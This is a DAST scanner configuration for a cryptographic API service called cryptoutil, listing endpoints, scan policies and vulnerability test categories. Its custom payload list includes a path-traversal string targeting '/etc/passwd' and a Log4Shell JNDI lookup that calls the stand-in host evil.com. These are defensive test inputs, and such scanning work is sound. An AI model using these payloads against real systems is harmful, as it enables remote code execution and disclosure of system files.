# DAST Configuration for cryptoutil

# Target configuration
target_url: "http://localhost:8080"
openapi_spec: "//ui/swagger/doc.json"

# Authentication configuration (if needed)
authentication:
  # For future use if authentication is implemented later
  # Currently cryptoutil uses IP allowlisting and CSRF tokens
  type: "none"

# Scan policies
scan_policies:
  # Full scan configuration
  full_scan:
    max_duration: 600  # 10 minutes
    max_rule_duration: 60  # 1 minute per rule
    threads: 10
    delay_between_requests: 0

  # API scan configuration
  api_scan:
    max_duration: 300  # 5 minutes
    include_alpha_rules: true
    include_beta_rules: false

  # Nuclei scan configuration
  nuclei_scan:
    templates:
      - "cves/"
      - "vulnerabilities/"
      - "security-misconfiguration/"
      - "default-logins/"
      - "exposed-panels/"
      - "takeovers/"
      - "technologies/"
    concurrency: 24
    rate_limit: 200
    timeout: 5

# Endpoints to focus on
critical_endpoints:
  - "/api/v1/crypto/keys/generate"
  - "/api/v1/crypto/keys/import"
  - "/api/v1/crypto/encrypt"
  - "/api/v1/crypto/decrypt"
  - "/api/v1/crypto/sign"
  - "/api/v1/crypto/verify"
  - "/api/v1/crypto/digest"
  - "/api/v1/admin/unseal"
  - "/api/v1/admin/seal"

# Security test categories
test_categories:
  injection:
    enabled: true
    severity: "FAIL"
    tests:
      - "SQL Injection"
      - "Command Injection"
      - "LDAP Injection"
      - "XPath Injection"
      - "Code Injection"

  authentication:
    enabled: true
    severity: "FAIL"
    tests:
      - "Authentication Bypass"
      - "Session Management"
      - "JWT Security"

  encryption_crypto:
    enabled: true
    severity: "FAIL"
    tests:
      - "Weak Encryption"
      - "Padding Oracle"
      - "Cryptographic Issues"
      - "SSL/TLS Configuration"

  information_disclosure:
    enabled: true
    severity: "WARN"
    tests:
      - "Error Messages"
      - "Directory Browsing"
      - "Source Code Disclosure"
      - "Backup Files"

  security_headers:
    enabled: true
    severity: "WARN"
    tests:
      - "Missing Security Headers"
      - "CORS Configuration"
      - "Content Security Policy"

# Reporting configuration
reporting:
  formats:
    - "html"
    - "json"
    - "xml"
  include_false_positives: false
  minimum_severity: "MEDIUM"

# Custom payloads for cryptographic testing
custom_payloads:
  crypto_keys:
    - ""
    - "null"
    - "invalid-key-format"
    - "LS0tLS1CRUdJTi" # Truncated base64

  crypto_data:
    - ""
    - "null"
    - "invalid-data"
    - "../../../etc/passwd"
    - "${jndi:ldap://evil.com/a}"
